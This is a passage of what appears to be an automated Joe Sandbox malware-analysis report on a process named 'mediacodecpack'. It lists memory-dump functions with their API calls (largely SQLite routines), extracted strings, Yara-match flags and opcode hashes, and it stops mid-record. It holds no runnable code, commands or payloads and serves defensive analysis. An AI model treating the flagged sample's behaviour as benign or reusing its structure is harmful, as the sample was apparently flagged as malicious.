                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1645262487-0
                                                                                            • Opcode ID: e6d05e22069f58296717e27aa8f005a9d54870673b2ee7143c14fa7c09956888
                                                                                            • Instruction ID: 92c6ba5458641c1c5745e47cbdc5c0f34297f2939a2aee854799526aefa85bbe
                                                                                            • Opcode Fuzzy Hash: e6d05e22069f58296717e27aa8f005a9d54870673b2ee7143c14fa7c09956888
                                                                                            • Instruction Fuzzy Hash: FF023471C00259AFEF15DBA4D854BEEBBB9EF08304F10455AE945B7280EB745E88CFA1
                                                                                            APIs
                                                                                            • RtlDecodePointer.NTDLL(?), ref: 02D56EF8
                                                                                            • _free.LIBCMT ref: 02D56F11
                                                                                              • Part of subcall function 02D51F84: HeapFree.KERNEL32(00000000,00000000,?,02D54942,00000000,00000104,75570A60), ref: 02D51F98
                                                                                              • Part of subcall function 02D51F84: GetLastError.KERNEL32(00000000,?,02D54942,00000000,00000104,75570A60), ref: 02D51FAA
                                                                                            • _free.LIBCMT ref: 02D56F24
                                                                                            • _free.LIBCMT ref: 02D56F42
                                                                                            • _free.LIBCMT ref: 02D56F54
                                                                                            • _free.LIBCMT ref: 02D56F65
                                                                                            • _free.LIBCMT ref: 02D56F70
                                                                                            • _free.LIBCMT ref: 02D56F94
                                                                                            • RtlEncodePointer.NTDLL(008097A8), ref: 02D56F9B
                                                                                            • _free.LIBCMT ref: 02D56FB0
                                                                                            • _free.LIBCMT ref: 02D56FC6
                                                                                            • _free.LIBCMT ref: 02D56FEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 3064303923-0
                                                                                            • Opcode ID: ccdfc91873b487887d483833106696247337aa37d9bd4846ecc68feca4b3db7a
                                                                                            • Instruction ID: 02525ac17b6bb1697648449033a9b5ae1907ba1f7a7bde06acc323d38059ed12
                                                                                            • Opcode Fuzzy Hash: ccdfc91873b487887d483833106696247337aa37d9bd4846ecc68feca4b3db7a
                                                                                            • Instruction Fuzzy Hash: FC215136D851319FCF225F64B8406567779EB047297694929EC0897380EB7DDC68CFE0
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                            • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                            • sqlite3_free.SQLITE3 ref: 60960618
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: offsets
                                                                                            • API String ID: 463808202-2642679573
                                                                                            • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                            • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                            • String ID:
                                                                                            • API String ID: 2903785150-0
                                                                                            • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                            • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D43428
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D4346B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D43472
                                                                                            • GetLastError.KERNEL32 ref: 02D43486
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D434D7
                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D434ED
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D43518
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                            • API String ID: 2902213904-434325024
                                                                                            • Opcode ID: 8176c897b94d848d39095b0732f37f9862324c114dce4f7ab933aad3e6931fb7
                                                                                            • Instruction ID: 15f4a69327ce84482e38a6623cd2fc450e06fa701b937fe198703b09bf8b6701
                                                                                            • Opcode Fuzzy Hash: 8176c897b94d848d39095b0732f37f9862324c114dce4f7ab933aad3e6931fb7
                                                                                            • Instruction Fuzzy Hash: A1315EB1900205DFDB119F68D858BAA7BB9FF49311F214499E8199B340DB74DD50CFB1
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                            • String ID:
                                                                                            • API String ID: 3556715608-0
                                                                                            • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                            • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                            • API String ID: 0-780898
                                                                                            • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                            • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                            • API String ID: 0-2604012851
                                                                                            • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                            • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                              • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                              • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                            • String ID: |
                                                                                            • API String ID: 1576672187-2343686810
                                                                                            • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                            • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                            • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                            • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                            APIs
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                              • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                            • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                            • API String ID: 652164897-1572359634
                                                                                            • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                            • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                            • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                            • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 2352520524-0
                                                                                            • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                            • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                            • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                            • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: optimize
                                                                                            • API String ID: 3659050757-3797040228
                                                                                            • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                            • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                            APIs
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                            • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                            • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                            • sqlite3_free.SQLITE3 ref: 60965714
                                                                                            • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2722129401-0
                                                                                            • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                            • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                            • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                              • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                            • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                              • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                            • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                            • sqlite3_free.SQLITE3 ref: 60964783
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 571598680-0
                                                                                            • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
